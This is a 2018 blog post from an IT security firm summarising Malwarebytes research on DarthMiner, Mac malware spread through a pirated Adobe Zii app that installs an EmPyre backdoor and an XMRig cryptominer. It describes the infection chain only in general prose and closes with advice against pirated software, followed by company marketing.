Previous All Posts Next

DarthMiner Malware Targets Mac Users via Adobe

Posted: December 11, 2018 to Technology.

Tags: Malware, Data Breach, Cloud Security

Darthminer is a recently discovered threat that targets Mac systems via Adobe.  Malwarebytes security researches warn that the threat is actually a combination of two open-source programs. The threat is distributed through an application called Adobe Zii.  It utilizes a generic Automater applet icon instead of a stolen Adobe Creative Cloud logo.  The fake application runs a shell script that downloads and executes a Python script.  Then it downloads and runs an app named sample.app.  The sample.app appears to be a version of Adobe Zii in an effort to conceal its malicious activity. Malwarebytes states that “the obfuscated Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and stops the infection process if the tool is found.”  They also note that the firewall should have already blocked the script’s download attempts. Next, the script generates an EmPyre backend door that can execute arbitrary commands on the infected Mac.  Scripts are fetched via that backdoor, and other malicious malware components are installed. It is this backdoor that is the true concern.  Further, a launch agent ensures persistence. As if that weren’t enough, the attack also results in the XMRig cryptominer being installed on the compromised Mac with its own launch agent to keep the process running. “It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things,” Malwarebytes notes.  Further analysis of the script also revealed code to download and install a root certificate for the mitmproxy tool.  The tool can intercept web traffic, including encrypted traffic, however, it isn’t active in the observed malware. A key issue surrounding this threat is software piracy, which will compound Mac infections if the threat is copied and distributed along with the software. Malwarebytes implored people to forego downloading and using pirated software, pointing out that it could cost users more than buying legitimate software. Security awareness training can also prevent many computer and system infection. Learn more about it here.

Protect Your Business Today

Petronella Technology Group has provided cybersecurity, compliance, and managed IT services from Raleigh, NC for over 23 years. Contact us today for a free consultation and technology assessment.

Need help implementing these strategies? Our cybersecurity experts can assess your environment and build a tailored plan.
Get Free Assessment
Explore Our Services
Cybersecurity AI Services Compliance HIPAA CMMC Managed IT

Related Articles

Build an AI Agent with n8n: Step-by-Step Tutorial Ollama vs vLLM: Enterprise AI Inference Comparison 2026 Proxmox vs VMware 2026: Why We Migrated (And You Should Too) AI Workstation Build Guide 2026: RTX 5090 Deep Learning Setup

About the Author

Craig Petronella, CEO and Founder of Petronella Technology Group
CEO, Founder & AI Architect, Petronella Technology Group

Craig Petronella founded Petronella Technology Group in 2002 and has spent more than 30 years working at the intersection of cybersecurity, AI, compliance, and digital forensics. He holds the CMMC Registered Practitioner credential (RP-1372) issued by the Cyber AB, is an NC Licensed Digital Forensics Examiner (License #604180-DFE), and completed MIT Professional Education programs in AI, Blockchain, and Cybersecurity. Craig also holds CompTIA Security+, CCNA, and Hyperledger certifications.

He is an Amazon #1 Best-Selling Author of 15+ books on cybersecurity and compliance, host of the Encrypted Ambition podcast (95+ episodes on Apple Podcasts, Spotify, and Amazon), and a cybersecurity keynote speaker with 200+ engagements at conferences, law firms, and corporate boardrooms. Craig serves as Contributing Editor for Cybersecurity at NC Triangle Attorney at Law Magazine and is a guest lecturer at NCCU School of Law. He has served as a digital forensics expert witness in federal and state court cases involving cybercrime, cryptocurrency fraud, SIM-swap attacks, and data breaches.

Under his leadership, Petronella Technology Group has served 2,500+ clients, maintained a zero-breach record among compliant clients, earned a BBB A+ rating every year since 2003, and been featured as a cybersecurity authority on CBS, ABC, NBC, FOX, and WRAL. The company leverages SOC 2 Type II certified platforms and specializes in AI implementation, managed cybersecurity, CMMC/HIPAA/SOC 2 compliance, and digital forensics for businesses across the United States.

CMMC-RP NC Licensed DFE MIT Certified CompTIA Security+ Expert Witness 15+ Books
Related Service
Enterprise IT Solutions & AI Integration

From AI implementation to cloud infrastructure, PTG helps businesses deploy technology securely and at scale.

Explore AI & IT Services
Previous All Posts Next
Free cybersecurity consultation available Schedule Now